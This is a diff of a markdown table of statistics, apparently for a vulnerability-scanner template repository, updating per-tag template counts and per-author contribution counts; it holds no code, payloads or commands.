7 | | | | | | | -| springboot | 35 | randomstr1ng | 7 | | | | | | | -| tenable | 35 | harshbothra_ | 7 | | | | | | | -| traversal | 35 | amit-jd | 7 | | | | | | | -| hackerone | 34 | caspergn | 7 | | | | | | | -| injection | 33 | techryptic (@tech) | 7 | | | | | | | -| jira | 32 | leovalcante | 7 | | | | | | | -| listing | 31 | _0xf4n9x_ | 6 | | | | | | | -| debug | 30 | puzzlepeaches | 6 | | | | | | | -| huntr | 29 | pentest_swissky | 6 | | | | | | | -| kubernetes | 29 | nullfuzz | 6 | | | | | | | -| generic | 28 | evan rubinstein | 6 | | | | | | | -| dns | 27 | praetorian-thendrickson | 6 | | | | | | | -| log4j | 26 | imnightmaree | 6 | | | | | | | -| cnvd | 25 | pathtaga | 6 | | | | | | | -| microsoft | 25 | forgedhallpass | 6 | | | | | | | -| sap | 25 | __fazal | 6 | | | | | | | -| jndi | 23 | gitlab red team | 6 | | | | | | | -| proxy | 23 | ricardomaia | 6 | | | | | | | -| misc | 23 | rootxharsh | 6 | | | | | | | -| aws | 22 | iamnoooob | 6 | | | | | | | -| php | 22 | podalirius | 5 | | | | | | | -| wp-theme | 21 | xelkomy | 5 | | | | | | | -| zoho | 21 | yanyun | 5 | | | | | | | -| manageengine | 21 | nodauf | 5 | | | | | | | -| fuzz | 21 | panch0r3d | 5 | | | | | | | -| weblogic | 20 | prajiteshsingh | 5 | | | | | | | -| cve2012 | 20 | ganofins | 5 | | | | | | | +| debug | 37 | randomstr1ng | 7 | | | | | | | +| hackerone | 37 | amit-jd | 7 | | | | | | | +| tenable | 36 | dr_set | 7 | | | | | | | +| traversal | 35 | techryptic (@tech) | 7 | | | | | | | +| springboot | 35 | harshbothra_ | 7 | | | | | | | +| injection | 34 | leovalcante | 7 | | | | | | | +| jira | 32 | caspergn | 7 | | | | | | | +| listing | 31 | gitlab red team | 6 | | | | | | | +| huntr | 31 | __fazal | 6 | | | | | | | +| kubernetes | 30 | imnightmaree | 6 | | | | | | | +| generic | 28 | nullfuzz | 6 | | | | | | | +| dns | 27 | _0xf4n9x_ | 6 | | | | | | | +| log4j | 26 | iamnoooob | 6 | | | | | | | +| sap | 25 | pentest_swissky | 6 | | | | | | | +| microsoft | 25 | praetorian-thendrickson | 6 | | | | | | | +| cnvd | 25 | puzzlepeaches | 6 | | | | | | | +| misc | 23 | forgedhallpass | 6 | | | | | | | +| aws | 23 | pathtaga | 6 | | | | | | | +| proxy | 23 | rootxharsh | 6 | | | | | | | +| jndi | 23 | evan rubinstein | 6 | | | | | | | +| fuzz | 22 | clem9669 | 5 | | | | | | | +| php | 22 | nodauf | 5 | | | | | | | +| cve2012 | 21 | its0x08 | 5 | | | | | | | +| zoho | 21 | xelkomy | 5 | | | | | | | +| wp-theme | 21 | podalirius | 5 | | | | | | | +| manageengine | 21 | prajiteshsingh | 5 | | | | | | | +| api | 20 | panch0r3d | 5 | | | | | | | +| weblogic | 20 | ganofins | 5 | | | | | | | | cloud | 20 | joanbono | 5 | | | | | | | -| tomcat | 19 | clem9669 | 5 | | | | | | | -| cicd | 19 | 0xlittleboy | 4 | | | | | | | -| k8s | 19 | dadevel | 4 | | | | | | | -| ibm | 19 | tanq16 | 4 | | | | | | | -| camera | 19 | incogbyte | 4 | | | | | | | -| api | 19 | r3naissance | 4 | | | | | | | -| deserialization | 19 | dolev farhi | 4 | | | | | | | -| dlink | 18 | h1ei1 | 4 | | | | | | | -| gitlab | 18 | defr0ggy | 4 | | | | | | | +| camera | 19 | yanyun | 5 | | | | | | | +| ibm | 19 | scent2d | 4 | | | | | | | +| cicd | 19 | powerexploit | 4 | | | | | | | +| deserialization | 19 | wisnupramoedya | 4 | | | | | | | +| k8s | 19 | r3naissance | 4 | | | | | | | +| tomcat | 19 | 3th1c_yuk1 | 4 | | | | | | | +| gitlab | 18 | dolev farhi | 4 | | | | | | | +| dlink | 18 | hardik-solanki | 4 | | | | | | | +| jenkins | 17 | h1ei1 | 4 | | | | | | | +| wavlink | 17 | 0xlittleboy | 4 | | | | | | | +| firewall | 17 | defr0ggy | 4 | | | | | | | | service | 17 | e_schultze_ | 4 | | | | | | | -| firewall | 17 | its0x08 | 4 | | | | | | | -| wavlink | 17 | robotshell | 4 | | | | | | | -| jenkins | 17 | scent2d | 4 | | | | | | | -| struts | 16 | wisnupramoedya | 4 | | | | | | | -| printer | 16 | 3th1c_yuk1 | 4 | | | | | | | -| ftp | 16 | shine | 3 | | | | | | | +| struts | 17 | shine | 4 | | | | | | | +| ftp | 16 | incogbyte | 4 | | | | | | | +| printer | 16 | dadevel | 4 | | | | | | | +| cve2011 | 15 | robotshell | 4 | | | | | | | +| nginx | 15 | tanq16 | 4 | | | | | | | +| xxe | 15 | lark-lab | 3 | | | | | | | | cve2009 | 15 | mr-xn | 3 | | | | | | | -| xxe | 15 | swissky | 3 | | | | | | | -| cve2011 | 15 | lucasljm2001 | 3 | | | | | | | -| nginx | 15 | z3bd | 3 | | | | | | | -| java | 14 | jarijaas | 3 | | | | | | | -| android | 14 | mavericknerd | 3 | | | | | | | -| hp | 14 | shifacyclewala | 3 | | | | | | | -| fortinet | 14 | johnjhacking | 3 | | | | | | | -| domainmod | 14 | davidmckennirey | 3 | | | | | | | -| lfr | 13 | lark-lab | 3 | | | | | | | -| woocommerce | 13 | ph33r | 3 | | | | | | | -| amazon | 13 | hahwul | 3 | | | | | | | -| magento | 13 | ekrause | 3 | | | | | | | -| cve2013 | 13 | powerexploit | 3 | | | | | | | -| confluence | 13 | skeltavik | 3 | | | | | | | -| msf | 13 | impramodsargar | 3 | | | | | | | -| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | -| status | 13 | me9187 | 3 | | | | | | | -| ruijie | 12 | kh4sh3i | 3 | | | | | | | -| rails | 12 | binaryfigments | 3 | | | | | | | -| netgear | 12 | fxploit | 3 | | | | | | | -| netsweeper | 12 | whoever | 3 | | | | | | | -| cve2008 | 12 | 0w4ys | 3 | | | | | | | +| java | 14 | _generic_human_ | 3 | | | | | | | +| fortinet | 14 | splint3r7 | 3 | | | | | | | +| domainmod | 14 | thomas_from_offensity | 3 | | | | | | | +| hp | 14 | ph33r | 3 | | | | | | | +| android | 14 | arcc | 3 | | | | | | | +| amazon | 13 | davidmckennirey | 3 | | | | | | | +| magento | 13 | jarijaas | 3 | | | | | | | +| abstractapi | 13 | lucasljm2001 | 3 | | | | | | | +| cve2008 | 13 | swissky | 3 | | | | | | | +| confluence | 13 | me9187 | 3 | | | | | | | +| msf | 13 | dudez | 3 | | | | | | | +| woocommerce | 13 | shifacyclewala | 3 | | | | | | | +| status | 13 | f1tz | 3 | | | | | | | +| cve2013 | 13 | emenalf | 3 | | | | | | | +| lfr | 13 | yuzhe-zhang-0 | 3 | | | | | | | +| vpn | 12 | z3bd | 3 | | | | | | | +| github | 12 | sushantkamble | 3 | | | | | | | +| netgear | 12 | binaryfigments | 3 | | | | | | | +| drupal | 12 | ekrause | 3 | | | | | | | | graphql | 12 | unstabl3 | 3 | | | | | | | -| drupal | 12 | splint3r7 | 3 | | | | | | | -| backup | 12 | fyoorer | 3 | | | | | | | -| microweber | 12 | supras | 3 | | | | | | | -| github | 12 | dudez | 3 | | | | | | | -| vpn | 11 | dr0pd34d | 3 | | | | | | | -| cisa | 11 | sushantkamble | 3 | | | | | | | -| backdoor | 11 | thomas_from_offensity | 3 | | | | | | | -| fortigate | 11 | alifathi-h1 | 3 | | | | | | | -| mail | 11 | andydoering | 3 | | | | | | | -| ssl | 11 | f1tz | 3 | | | | | | | -| azure | 11 | _generic_human_ | 3 | | | | | | | -| airflow | 11 | atomiczsec | 3 | | | | | | | -| webserver | 11 | arcc | 3 | | | | | | | -| cnvd2021 | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| coldfusion | 10 | emenalf | 3 | | | | | | | -| ruby | 10 | kiblyn11 | 2 | | | | | | | -| glpi | 10 | clarkvoss | 2 | | | | | | | -| jolokia | 10 | moritz nentwig | 2 | | | | | | | -| grafana | 10 | sy3omda | 2 | | | | | | | -| zyxel | 10 | vavkamil | 2 | | | | | | | -| spring | 10 | gal nagli | 2 | | | | | | | -| django | 10 | ehsahil | 2 | | | | | | | -| dell | 10 | nuk3s3c | 2 | | | | | | | -| git | 10 | x1m_martijn | 2 | | | | | | | -| laravel | 10 | nvn1729 | 2 | | | | | | | -| fastjson | 9 | geekby | 2 | | | | | | | -| kube | 9 | r12w4n | 2 | | | | | | | -| zabbix | 9 | socketz | 2 | | | | | | | -| phpmyadmin | 9 | fabaff | 2 | | | | | | | -| dedecms | 9 | sbani | 2 | | | | | | | -| ssti | 9 | bananabr | 2 | | | | | | | -| prometheus | 9 | uomogrande | 2 | | | | | | | -| vcenter | 9 | 0xsmiley | 2 | | | | | | | -| windows | 9 | huowuzhao | 2 | | | | | | | -| iis | 9 | udit_thakkur | 2 | | | | | | | -| zimbra | 9 | d4vy | 2 | | | | | | | -| wso2 | 9 | paperpen | 2 | | | | | | | -| sonicwall | 9 | hackerarpan | 2 | | | | | | | -| kafka | 8 | bsysop | 2 | | | | | | | -| config-audit | 8 | redteambrasil | 2 | | | | | | | -| jboss | 8 | 0xsapra | 2 | | | | | | | -| cisco-switch | 8 | n-thumann | 2 | | | | | | | -| mirai | 8 | ambassify | 2 | | | | | | | -| solr | 8 | badboycxcc | 2 | | | | | | | -| recon | 8 | wa1tf0rme | 2 | | | | | | | -| elasticsearch | 8 | 0xrudra | 2 | | | | | | | -| audit | 8 | koti2 | 2 | | | | | | | -| auth | 8 | brenocss | 2 | | | | | | | -| citrix | 8 | github.com/its0x08 | 2 | | | | | | | -| scada | 8 | dbrwsky | 2 | | | | | | | -| solarview | 8 | 0xnirvana | 2 | | | | | | | -| metadata | 8 | cckuakilong | 2 | | | | | | | -| hms | 8 | evergreencartoons | 2 | | | | | | | -| headless | 8 | w4cky_ | 2 | | | | | | | -| blind | 7 | joeldeleep | 2 | | | | | | | -| nodejs | 7 | korteke | 2 | | | | | | | -| samsung | 7 | canberbamber | 2 | | | | | | | -| druid | 7 | convisoappsec | 2 | | | | | | | -| symfony | 7 | vsh00t | 2 | | | | | | | -| go | 7 | joshlarsen | 2 | | | | | | | -| jetbrains | 7 | randomrobbie | 2 | | | | | | | -| seeyon | 7 | z0ne | 2 | | | | | | | -| bucket | 7 | cocxanh | 2 | | | | | | | -| exchange | 7 | danielmofer | 2 | | | | | | | -| icewarp | 7 | zomsop82 | 2 | | | | | | | -| firebase | 7 | bernardofsr | 2 | | | | | | | -| opencats | 7 | raesene | 2 | | | | | | | -| squirrelmail | 7 | ajaysenr | 2 | | | | | | | -| maps | 7 | manas_harsh | 2 | | | | | | | -| detect | 7 | ricardo maia (brainfork) | 2 | | | | | | | -| cnvd2020 | 7 | pxmme1337 | 2 | | | | | | | -| docker | 7 | lotusdll | 2 | | | | | | | -| npm | 7 | dheerajmadhukar | 2 | | | | | | | -| python | 7 | smaranchand | 2 | | | | | | | -| setup | 6 | 8arthur | 2 | | | | | | | -| liferay | 6 | paradessia | 2 | | | | | | | -| moodle | 6 | 0xelkomy | 2 | | | | | | | -| cobbler | 6 | ree4pwn | 2 | | | | | | | -| vms | 6 | amsda | 2 | | | | | | | -| artica | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| ognl | 6 | nkxxkn | 2 | | | | | | | -| emerge | 6 | foulenzer | 2 | | | | | | | -| ssh | 6 | myztique | 2 | | | | | | | -| cache | 6 | kre80r | 2 | | | | | | | -| ofbiz | 6 | 0xcrypto | 2 | | | | | | | -| slack | 6 | dahse89 | 2 | | | | | | | -| activemq | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| crlf | 6 | bing0o | 2 | | | | | | | -| opensis | 6 | bp0lr | 2 | | | | | | | -| rconfig | 6 | afaq | 2 | | | | | | | -| magmi | 6 | israel comazzetto dos reis | 2 | | | | | | | -| lucee | 6 | parth | 2 | | | | | | | -| db | 6 | martincodes-de | 2 | | | | | | | -| sitecore | 6 | taielab | 2 | | | | | | | -| openvpn | 6 | hetroublemakr | 2 | | | | | | | -| microstrategy | 6 | 666asd | 2 | | | | | | | -| bypass | 6 | k11h-de | 2 | | | | | | | -| ecology | 6 | mohammedsaneem | 2 | | | | | | | -| node | 6 | rafaelwdornelas | 2 | | | | | | | -| jamf | 6 | gevakun | 2 | | | | | | | -| zhiyuan | 6 | g4l1t0 | 2 | | | | | | | -| huawei | 6 | v0idc0de | 2 | | | | | | | -| websphere | 6 | thezakman | 2 | | | | | | | -| jetty | 6 | luci | 2 | | | | | | | -| bigip | 6 | true13 | 2 | | | | | | | -| kubelet | 6 | thardt-praetorian | 2 | | | | | | | -| fpd | 6 | codexlynx | 2 | | | | | | | -| enum | 6 | y4er | 2 | | | | | | | -| smtp | 6 | 0xprial | 2 | | | | | | | -| firmware | 5 | _c0wb0y_ | 1 | | | | | | | -| thinkphp | 5 | florianmaak | 1 | | | | | | | -| gocd | 5 | ipanda | 1 | | | | | | | -| awstats | 5 | amanrawat | 1 | | | | | | | -| leak | 5 | ahmetpergamum | 1 | | | | | | | -| cockpit | 5 | absshax | 1 | | | | | | | -| redis | 5 | wlayzz | 1 | | | | | | | -| apisix | 5 | 0xceba | 1 | | | | | | | -| gogs | 5 | sshell | 1 | | | | | | | -| plesk | 5 | flag007 | 1 | | | | | | | -| fatpipe | 5 | sicksec | 1 | | | | | | | -| solarwinds | 5 | _harleo | 1 | | | | | | | -| elfinder | 5 | opencirt | 1 | | | | | | | -| minio | 5 | hakimkt | 1 | | | | | | | -| mongodb | 5 | elder tao | 1 | | | | | | | -| error | 5 | petruknisme | 1 | | | | | | | -| symantec | 5 | lixts | 1 | | | | | | | -| scan | 5 | unkl4b | 1 | | | | | | | -| admin | 5 | aceseven (digisec360) | 1 | | | | | | | -| fortios | 5 | juicypotato1 | 1 | | | | | | | -| alibaba | 5 | makyotox | 1 | | | | | | | -| prestashop | 5 | elmahdi | 1 | | | | | | | -| metinfo | 5 | clment cruchet | 1 | | | | | | | -| carrental | 5 | kareemse1im | 1 | | | | | | | -| keycloak | 5 | thelicato | 1 | | | | | | | -| database | 5 | liquidsec | 1 | | | | | | | -| avideo | 5 | tirtha_mandal | 1 | | | | | | | -| rfi | 5 | iampritam | 1 | | | | | | | -| strapi | 5 | s0obi | 1 | | | | | | | -| elastic | 5 | daviey | 1 | | | | | | | -| nagios | 5 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| rseenet | 5 | aresx | 1 | | | | | | | -| filemanager | 5 | _darrenmartyn | 1 | | | | | | | -| storage | 5 | 0xrod | 1 | | | | | | | -| 74cms | 5 | evolutionsec | 1 | | | | | | | -| parallels | 5 | micha3lb3n | 1 | | | | | | | -| circarlife | 5 | kba@sogeti_esec | 1 | | | | | | | -| paypal | 4 | jeya.seelan | 1 | | | | | | | -| voip | 4 | vzamanillo | 1 | | | | | | | -| hashicorp | 4 | andirrahmani1 | 1 | | | | | | | -| vrealize | 4 | d0rkerdevil | 1 | | | | | | | -| horde | 4 | 2rs3c | 1 | | | | | | | -| sophos | 4 | mrcl0wnlab | 1 | | | | | | | -| sangfor | 4 | bibeksapkota (sar00n) | 1 | | | | | | | -| panos | 4 | udinchan | 1 | | | | | | | -| gitea | 4 | 0xteles | 1 | | | | | | | -| nexus | 4 | jiheon-dev | 1 | | | | | | | -| nosqli | 4 | breno_css | 1 | | | | | | | -| sql | 4 | tea | 1 | | | | | | | -| wcs | 4 | 0xceeb | 1 | | | | | | | -| hpe | 4 | apt-mirror | 1 | | | | | | | -| candidats | 4 | x6263 | 1 | | | | | | | -| kibana | 4 | ramkrishna sawant | 1 | | | | | | | -| prtg | 4 | fmunozs | 1 | | | | | | | -| phppgadmin | 4 | rojanrijal | 1 | | | | | | | -| console | 4 | berkdusunur | 1 | | | | | | | -| hikvision | 4 | b0rn2r00t | 1 | | | | | | | +| netsweeper | 12 | fxploit | 3 | | | | | | | +| backup | 12 | alifathi-h1 | 3 | | | | | | | +| rails | 12 | 0w4ys | 3 | | | | | | | +| microweber | 12 | mavericknerd | 3 | | | | | | | +| ruijie | 12 | whoever | 3 | | | | | | | +| zyxel | 11 | andydoering | 3 | | | | | | | +| mail | 11 | supras | 3 | | | | | | | +| ssl | 11 | impramodsargar | 3 | | | | | | | +| webserver | 11 | yash anand @yashanand155 | 3 | | | | | | | +| airflow | 11 | hahwul | 3 | | | | | | | +| cisa | 11 | fyoorer | 3 | | | | | | | +| fortigate | 11 | ambassify | 3 | | | | | | | +| azure | 11 | johnjhacking | 3 | | | | | | | +| backdoor | 11 | dr0pd34d | 3 | | | | | | | +| cnvd2021 | 11 | kh4sh3i | 3 | | | | | | | +| grafana | 10 | skeltavik | 3 | | | | | | | +| django | 10 | atomiczsec | 3 | | | | | | | +| ruby | 10 | moritz nentwig | 2 | | | | | | | +| jolokia | 10 | notnotnotveg | 2 | | | | | | | +| glpi | 10 | w4cky_ | 2 | | | | | | | +| laravel | 10 | ajaysenr | 2 | | | | | | | +| spring | 10 | hetroublemakr | 2 | | | | | | | +| dell | 10 | y4er | 2 | | | | | | | +| git | 10 | smaranchand | 2 | | | | | | | +| coldfusion | 10 | g4l1t0 | 2 | | | | | | | +| wso2 | 9 | bernardofsr | 2 | | | | | | | +| vcenter | 9 | myztique | 2 | | | | | | | +| sonicwall | 9 | k11h-de | 2 | | | | | | | +| ssh | 9 | thezakman | 2 | | | | | | | +| iis | 9 | uomogrande | 2 | | | | | | | +| kube | 9 | gal nagli | 2 | | | | | | | +| windows | 9 | nuk3s3c | 2 | | | | | | | +| zimbra | 9 | kiblyn11 | 2 | | | | | | | +| ssti | 9 | randomrobbie | 2 | | | | | | | +| zabbix | 9 | cocxanh | 2 | | | | | | | +| prometheus | 9 | gevakun | 2 | | | | | | | +| fastjson | 9 | raesene | 2 | | | | | | | +| phpmyadmin | 9 | bananabr | 2 | | | | | | | +| dedecms | 9 | dahse89 | 2 | | | | | | | +| citrix | 8 | 0xrudra | 2 | | | | | | | +| audit | 8 | wa1tf0rme | 2 | | | | | | | +| jboss | 8 | 8arthur | 2 | | | | | | | +| versa | 8 | canberbamber | 2 | | | | | | | +| kafka | 8 | rafaelwdornelas | 2 | | | | | | | +| cisco-switch | 8 | hackerarpan | 2 | | | | | | | +| solarview | 8 | lotusdll | 2 | | | | | | | +| solr | 8 | paperpen | 2 | | | | | | | +| recon | 8 | cckuakilong | 2 | | | | | | | +| auth | 8 | vsh00t | 2 | | | | | | | +| symfony | 8 | ehsahil | 2 | | | | | | | +| bucket | 8 | bsysop | 2 | | | | | | | +| headless | 8 | huowuzhao | 2 | | | | | | | +| scada | 8 | codexlynx | 2 | | | | | | | +| npm | 8 | paradessia | 2 | | | | | | | +| elasticsearch | 8 | github.com/its0x08 | 2 | | | | | | | +| metadata | 8 | dheerajmadhukar | 2 | | | | | | | +| mirai | 8 | 666asd | 2 | | | | | | | +| jetbrains | 8 | ree4pwn | 2 | | | | | | | +| config-audit | 8 | dbrwsky | 2 | | | | | | | +| hms | 8 | joeldeleep | 2 | | | | | | | +| firebase | 7 | ricardo maia (brainfork) | 2 | | | | | | | +| seeyon | 7 | brenocss | 2 | | | | | | | +| docker | 7 | 0xprial | 2 | | | | | | | +| cnvd2020 | 7 | sy3omda | 2 | | | | | | | +| icewarp | 7 | n-thumann | 2 | | | | | | | +| go | 7 | 0xsapra | 2 | | | | | | | +| exchange | 7 | korteke | 2 | | | | | | | +| druid | 7 | 0xsmiley | 2 | | | | | | | +| nodejs | 7 | sbani | 2 | | | | | | | +| python | 7 | 0xelkomy | 2 | | | | | | | +| squirrelmail | 7 | 0xcrypto | 2 | | | | | | | +| maps | 7 | thardt-praetorian | 2 | | | | | | | +| samsung | 7 | redteambrasil | 2 | | | | | | | +| ognl | 7 | bp0lr | 2 | | | | | | | +| blind | 7 | afaq | 2 | | | | | | | +| opencats | 7 | r12w4n | 2 | | | | | | | +| detect | 7 | amsda | 2 | | | | | | | +| websphere | 6 | danielmofer | 2 | | | | | | | +| lucee | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | convisoappsec | 2 | | | | | | | +| thinkphp | 6 | nkxxkn | 2 | | | | | | | +| moodle | 6 | foulenzer | 2 | | | | | | | +| activemq | 6 | x1m_martijn | 2 | | | | | | | +| ofbiz | 6 | koti2 | 2 | | | | | | | +| elfinder | 6 | manas_harsh | 2 | | | | | | | +| ecology | 6 | v0idc0de | 2 | | | | | | | +| admin | 6 | bing0o | 2 | | | | | | | +| cobbler | 6 | s0obi | 2 | | | | | | | +| bypass | 6 | parth | 2 | | | | | | | +| huawei | 6 | clarkvoss | 2 | | | | | | | +| artica | 6 | martincodes-de | 2 | | | | | | | +| magmi | 6 | badboycxcc | 2 | | | | | | | +| node | 6 | pxmme1337 | 2 | | | | | | | +| cache | 6 | socketz | 2 | | | | | | | +| db | 6 | israel comazzetto dos reis | 2 | | | | | | | +| openvpn | 6 | true13 | 2 | | | | | | | +| liferay | 6 | d4vy | 2 | | | | | | | +| enum | 6 | mohammedsaneem | 2 | | | | | | | +| fpd | 6 | kre80r | 2 | | | | | | | +| bigip | 6 | taielab | 2 | | | | | | | +| crlf | 6 | z0ne | 2 | | | | | | | +| emerge | 6 | joshlarsen | 2 | | | | | | | +| opensis | 6 | 0xnirvana | 2 | | | | | | | +| jamf | 6 | zomsop82 | 2 | | | | | | | +| kubelet | 6 | geekby | 2 | | | | | | | +| zhiyuan | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| jetty | 6 | evergreencartoons | 2 | | | | | | | +| setup | 6 | kishore-hariram | 2 | | | | | | | +| vms | 6 | luci | 2 | | | | | | | +| slack | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| smtp | 6 | vavkamil | 2 | | | | | | | +| microstrategy | 6 | fabaff | 2 | | | | | | | +| sitecore | 6 | nvn1729 | 2 | | | | | | | +| alibaba | 5 | pratik khalane | 1 | | | | | | | +| rfi | 5 | kailashbohara | 1 | | | | | | | +| awstats | 5 | bibeksapkota (sar00n) | 1 | | | | | | | +| scan | 5 | _c0wb0y_ | 1 | | | | | | | +| solarwinds | 5 | nobody | 1 | | | | | | | +| gogs | 5 | francescocarlucci | 1 | | | | | | | +| avideo | 5 | danigoland | 1 | | | | | | | +| s3 | 5 | djoevanka | 1 | | | | | | | +| firmware | 5 | toufik-airane | 1 | | | | | | | +| circarlife | 5 | remonsec | 1 | | | | | | | +| rseenet | 5 | 0xh7ml | 1 | | | | | | | +| plesk | 5 | majidmc2 | 1 | | | | | | | +| fortios | 5 | allenwest24 | 1 | | | | | | | +| fatpipe | 5 | charanrayudu | 1 | | | | | | | +| apisix | 5 | realexp3rt | 1 | | | | | | | +| carrental | 5 | ipanda | 1 | | | | | | | +| metinfo | 5 | akash.c | 1 | | | | | | | +| symantec | 5 | thelicato | 1 | | | | | | | +| strapi | 5 | iampritam | 1 | | | | | | | +| mongodb | 5 | ofjaaah | 1 | | | | | | | +| keycloak | 5 | aceseven (digisec360) | 1 | | | | | | | +| gocd | 5 | nagli | 1 | | | | | | | +| minio | 5 | couskito | 1 | | | | | | | +| parallels | 5 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| filemanager | 5 | yashgoti | 1 | | | | | | | +| prestashop | 5 | natto97 | 1 | | | | | | | +| database | 5 | httpvoid | 1 | | | | | | | +| elastic | 5 | push4d | 1 | | | | | | | +| storage | 5 | izn0u | 1 | | | | | | | +| nagios | 5 | shockwave | 1 | | | | | | | +| redis | 5 | thebinitghimire | 1 | | | | | | | +| vbulletin | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| 74cms | 5 | rotembar | 1 | | | | | | | +| leak | 5 | jaskaran | 1 | | | | | | | +| error | 5 | pdp | 1 | | | | | | | +| cockpit | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| wcs | 4 | zhenwarx | 1 | | | | | | | +| resin | 4 | jbaines-r7 | 1 | | | | | | | +| mailchimp | 4 | un-fmunozs | 1 | | | | | | | +| caucho | 4 | d0rkerdevil | 1 | | | | | | | +| hybris | 4 | mhdsamx | 1 | | | | | | | +| ampache | 4 | zinminphy0 | 1 | | | | | | | +| kentico | 4 | luskabol | 1 | | | | | | | +| redmine | 4 | coldfish | 1 | | | | | | | | axigen | 4 | ahmed abou-ela | 1 | | | | | | | -| adminer | 4 | nytr0gen | 1 | | | | | | | -| beyondtrust | 4 | remi gascou (podalirius) | 1 | | | | | | | -| cve2007 | 4 | af001 | 1 | | | | | | | -| redmine | 4 | 0h1in9e | 1 | | | | | | | -| phpinfo | 4 | revblock | 1 | | | | | | | -| oauth | 4 | aringo | 1 | | | | | | | -| ems | 4 | furkansenan | 1 | | | | | | | -| s3 | 4 | iphantasmic | 1 | | | | | | | -| resin | 4 | yavolo | 1 | | | | | | | -| zte | 4 | francescocarlucci | 1 | | | | | | | -| terramaster | 4 | patralos | 1 | | | | | | | -| royalevent | 4 | pjborah | 1 | | | | | | | -| vbulletin | 4 | ph33rr | 1 | | | | | | | -| hoteldruid | 4 | schniggie | 1 | | | | | | | -| yeswiki | 4 | qlkwej | 1 | | | | | | | -| sonarqube | 4 | furkansayim | 1 | | | | | | | -| ampache | 4 | maximus decimus | 1 | | | | | | | -| telerik | 4 | soyelmago | 1 | | | | | | | -| springcloud | 4 | exploitation | 1 | | | | | | | -| hongdian | 4 | ilovebinbash | 1 | | | | | | | -| gnuboard | 4 | dale clarke | 1 | | | | | | | -| kentico | 4 | sak1 | 1 | | | | | | | -| tikiwiki | 4 | prettyboyaaditya | 1 | | | | | | | -| oa | 4 | djoevanka | 1 | | | | | | | -| kevinlab | 4 | co0nan | 1 | | | | | | | -| postmessage | 4 | bernardo rodrigues | 1 | | | | | | | +| stripe | 4 | andysvints | 1 | | | | | | | +| gitea | 4 | b0yd | 1 | | | | | | | +| roxy | 4 | gboddin | 1 | | | | | | | +| sonarqube | 4 | jbertman | 1 | | | | | | | +| horde | 4 | skylark-lab | 1 | | | | | | | +| asp | 4 | kurohost | 1 | | | | | | | +| beyondtrust | 4 | queencitycyber | 1 | | | | | | | +| terramaster | 4 | higor melgaço (eremit4) | 1 | | | | | | | +| typo3 | 4 | sak1 | 1 | | | | | | | +| gnuboard | 4 | pascalheidmann | 1 | | | | | | | +| royalevent | 4 | notsoevilweasel | 1 | | | | | | | +| httpserver | 4 | lingtren | 1 | | | | | | | +| thinkcmf | 4 | rivalsec | 1 | | | | | | | +| cve2007 | 4 | elmahdi | 1 | | | | | | | +| zte | 4 | blckraven | 1 | | | | | | | +| nexus | 4 | harshinsecurity | 1 | | | | | | | +| console | 4 | compr00t | 1 | | | | | | | +| hashicorp | 4 | ringo | 1 | | | | | | | +| sql | 4 | screamy | 1 | | | | | | | +| panos | 4 | ok_bye_now | 1 | | | | | | | +| telerik | 4 | deena | 1 | | | | | | | +| phpinfo | 4 | vinit989 | 1 | | | | | | | +| springcloud | 4 | megamansec | 1 | | | | | | | +| umbraco | 4 | hanlaomo | 1 | | | | | | | +| oauth | 4 | 0h1in9e | 1 | | | | | | | +| telesquare | 4 | hakluke | 1 | | | | | | | +| hongdian | 4 | jrolf | 1 | | | | | | | +| hikvision | 4 | dale clarke | 1 | | | | | | | +| ems | 4 | caon | 1 | | | | | | | +| xmlrpc | 4 | bughuntersurya | 1 | | | | | | | +| cnvd2019 | 4 | amanrawat | 1 | | | | | | | +| hoteldruid | 4 | tea | 1 | | | | | | | +| vrealize | 4 | unkl4b | 1 | | | | | | | +| candidats | 4 | dievus | 1 | | | | | | | +| aspose | 4 | akshansh | 1 | | | | | | | +| sendgrid | 4 | aringo | 1 | | | | | | | +| cacti | 4 | kaizensecurity | 1 | | | | | | | +| adminer | 4 | calumjelrick | 1 | | | | | | | +| flink | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| nosqli | 4 | rojanrijal | 1 | | | | | | | +| voip | 4 | lark lab | 1 | | | | | | | +| couchdb | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| bmc | 4 | berkdusunur | 1 | | | | | | | +| rabbitmq | 4 | 0xd0ff9 | 1 | | | | | | | +| jellyfin | 4 | affix | 1 | | | | | | | +| dropbear | 4 | anon-artist | 1 | | | | | | | +| sophos | 4 | lethargynavigator | 1 | | | | | | | +| artifactory | 4 | lrtk-coder | 1 | | | | | | | +| hpe | 4 | dk999 | 1 | | | | | | | +| tenda | 4 | noamrathaus | 1 | | | | | | | +| kevinlab | 4 | ola456 | 1 | | | | | | | +| oa | 4 | imhunterand | 1 | | | | | | | +| photo | 4 | patralos | 1 | | | | | | | +| tikiwiki | 4 | alperenkesk | 1 | | | | | | | +| prtg | 4 | udinchan | 1 | | | | | | | +| kibana | 4 | maximus decimus | 1 | | | | | | | +| sangfor | 4 | clment cruchet | 1 | | | | | | | +| openemr | 4 | andirrahmani1 | 1 | | | | | | | +| puppet | 4 | ramkrishna sawant | 1 | | | | | | | +| paypal | 4 | yashanand155 | 1 | | | | | | | +| postmessage | 4 | official_blackhat13 | 1 | | | | | | | +| yeswiki | 4 | brabbit10 | 1 | | | | | | | +| search | 4 | h4kux | 1 | | | | | | | +| phppgadmin | 4 | dawid-czarnecki | 1 | | | | | | | +| linkerd | 4 | 0xteles | 1 | | | | | | | +| seagate | 3 | qlkwej | 1 | | | | | | | +| subrion | 3 | phyr3wall | 1 | | | | | | | +| geowebserver | 3 | juicypotato1 | 1 | | | | | | | +| intercom | 3 | husain | 1 | | | | | | | +| messaging | 3 | lamscun | 1 | | | | | | | +| lotus | 3 | paper-pen | 1 | | | | | | | +| sftp | 3 | sshell | 1 | | | | | | | +| redash | 3 